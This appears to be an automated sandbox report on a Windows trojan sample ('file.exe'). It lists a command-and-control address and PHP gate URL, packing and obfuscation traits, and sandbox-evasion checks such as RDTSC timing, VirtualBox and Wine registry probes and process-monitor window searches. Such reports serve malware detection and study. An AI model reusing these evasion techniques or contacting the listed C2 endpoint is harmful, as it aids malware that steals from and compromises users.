Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37=

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4	0_2_007010F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006070F3	0_2_006070F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005EC9B5	0_2_005EC9B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00632A96	0_2_00632A96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0071035F	0_2_0071035F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005B43DE	0_2_005B43DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00711BD7	0_2_00711BD7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00707C29	0_2_00707C29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005B34C6	0_2_005B34C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0060BCC8	0_2_0060BCC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076ACA0	0_2_0076ACA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00648DAB	0_2_00648DAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C0D8F	0_2_006C0D8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007EDE77	0_2_007EDE77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070966C	0_2_0070966C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00704625	0_2_00704625
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007A17DD	0_2_007A17DD

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 003445C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: xisdcata ZLIB complexity 0.9949372386961908

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00353720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00353720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\T1OZWGAW.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1809408 > 1048576

Source: file.exe

Static PE information: Raw size of xisdcata is bigger than: 0x100000 < 0x193a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c5de1 should be: 0x1c6936

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: xisdcata
Source: file.exe	Static PE information: section name: bazuxvkp
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0035B035 push ecx; ret	0_2_0035B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076D012 push eax; mov dword ptr [esp], edx	0_2_0076D05A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0076D012 push 7FECB9A0h; mov dword ptr [esp], edx	0_2_0076D081
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E7014 push 55D365F6h; mov dword ptr [esp], esi	0_2_007E707D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E7014 push 31CB389Bh; mov dword ptr [esp], edx	0_2_007E7114
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 4CED349Fh; mov dword ptr [esp], ebx	0_2_00701113
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 4CC958F3h; mov dword ptr [esp], ecx	0_2_0070111D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push eax; mov dword ptr [esp], edx	0_2_007012F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push eax; mov dword ptr [esp], edx	0_2_00701314
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebx; mov dword ptr [esp], edx	0_2_0070137C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 38C6E934h; mov dword ptr [esp], esi	0_2_007013CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], 2AD17891h	0_2_00701428
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edx; mov dword ptr [esp], 56D69300h	0_2_00701497
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edx; mov dword ptr [esp], esi	0_2_007014D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], edi	0_2_00701518
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 6DFF3FD2h; mov dword ptr [esp], esp	0_2_00701535
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 4F8DFF09h	0_2_007015EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 6C6DF282h; mov dword ptr [esp], ebx	0_2_00701743
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 3680CF58h; mov dword ptr [esp], ecx	0_2_0070174B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 5EEFCDE9h	0_2_007017CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push esi; mov dword ptr [esp], ebx	0_2_007017F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 3DFBA0E5h	0_2_007017FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 4CB923CBh	0_2_0070181A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push esi; mov dword ptr [esp], 7B2D27BAh	0_2_0070184F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], esi	0_2_007018E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 0FD4743Eh; mov dword ptr [esp], edi	0_2_0070198D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ecx; mov dword ptr [esp], edx	0_2_00701A77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push ebx; mov dword ptr [esp], 6E5BD191h	0_2_00701AFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 397CBF65h; mov dword ptr [esp], eax	0_2_00701B85
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push edx; mov dword ptr [esp], 16EDE921h	0_2_00701C3D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007010F4 push 3657D360h; mov dword ptr [esp], ebx	0_2_00701CAC

Source: file.exe

Static PE information: section name: xisdcata entropy: 7.953663128653993

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A2269 second address: 5A2286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618479h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5A2286 second address: 5A228A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715A53 second address: 715A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edi 0x0000000b jp 00007FCA94618468h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715A76 second address: 715A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715A7C second address: 715A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715D74 second address: 715D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 715EB6 second address: 715EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCA94618466h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71879C second address: 718833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E43h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, B2F7h 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D3700h] 0x0000001a push CF2C7F56h 0x0000001f jmp 00007FCA94C93E3Dh 0x00000024 add dword ptr [esp], 30D3812Ah 0x0000002b mov si, 2FFCh 0x0000002f push 00000003h 0x00000031 mov dx, 6C48h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FCA94C93E38h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 ja 00007FCA94C93E3Ch 0x00000057 mov ecx, esi 0x00000059 push 00000003h 0x0000005b mov dword ptr [ebp+122D17EFh], eax 0x00000061 push C0CF035Ch 0x00000066 jl 00007FCA94C93E4Bh 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 718911 second address: 718915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 718915 second address: 71891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71891F second address: 718923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 718B2B second address: 718B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCA94C93E3Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70775B second address: 707761 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 736F87 second address: 736F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737262 second address: 73726C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73726C second address: 73727C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94C93E3Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737808 second address: 73780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737936 second address: 73794D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCA94C93E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jbe 00007FCA94C93E36h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737D97 second address: 737D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737D9D second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711770 second address: 711777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73804C second address: 73805D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007FCA94C93E3Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73805D second address: 738063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 738063 second address: 738068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 738068 second address: 738089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FCA9461846Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F2B5 second address: 73F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F2B9 second address: 73F2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E873 second address: 73E877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74454D second address: 744566 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FCA94618468h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744703 second address: 744709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744C38 second address: 744C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744DF7 second address: 744E27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FCA94C93E42h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FCA94C93E3Dh 0x00000018 popad 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744F9C second address: 744FB8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94618466h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FCA9461846Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744FB8 second address: 744FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746F85 second address: 746F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746F8E second address: 746F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746F92 second address: 746FFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jne 00007FCA94618477h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FCA9461846Eh 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edi 0x0000001e jmp 00007FCA94618478h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FCA94618472h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746FFE second address: 747003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747720 second address: 747768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FCA94618477h 0x0000000f jmp 00007FCA94618471h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCA94618470h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747768 second address: 747772 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747772 second address: 747779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747832 second address: 747850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E49h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747850 second address: 747856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74804C second address: 748052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A1DC second address: 74A1F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94618468h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A1F1 second address: 74A1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 749A00 second address: 749A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA9461846Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74C361 second address: 74C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B591 second address: 74B596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74C366 second address: 74C36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74C36C second address: 74C370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750AAA second address: 750AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750AB0 second address: 750AC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jnp 00007FCA9461846Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A58 second address: 751A6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA94C93E38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
